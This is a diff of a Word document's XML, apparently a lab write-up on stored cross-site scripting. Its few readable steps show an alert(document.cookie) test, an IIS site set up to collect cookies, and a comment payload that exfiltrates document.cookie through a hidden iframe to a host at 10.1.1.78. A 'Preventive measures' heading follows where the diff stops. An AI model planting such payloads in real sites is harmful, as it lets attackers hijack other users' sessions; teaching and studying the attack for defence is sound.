+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>53340</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>522605</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5155565" cy="2900045"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="15" name="Image12" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="15" name="Image12" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5155565" cy="2900045"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>build a IIS website to save the cookies</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="15">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>169545</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>77470</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5650230" cy="3178175"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="16" name="Image14" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="16" name="Image14" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5650230" cy="3178175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>add comments containing:</w:t>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;document.write("&lt;iframe width=0 height=0 src='</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId19">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:i/>
+            <w:iCs/>
+            <w:sz w:val="21"/>
+            <w:szCs w:val="21"/>
+          </w:rPr>
+          <w:t>http://10.1.1.78/cookie.asp?cookie</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>="+document.cookie+"'&gt;&lt;/iframe&gt;");&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="16">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>158115</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>59690</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5632450" cy="3168015"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="17" name="Image15" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="17" name="Image15" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5632450" cy="3168015"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Now we receive the cookies</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="0"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
+        <w:ind w:left="840" w:hanging="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>133350</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>142875</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5853430" cy="3292475"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="18" name="Image16" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="18" name="Image16" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5853430" cy="3292475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
         <w:spacing w:before="240" w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
@@ -2304,21 +4524,180 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Standard"/>
+        <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
-      </w:pPr>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="Preventive_measures"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="72"/>
-        </w:rPr>
-        <w:t>1</w:t>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Preventive measures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
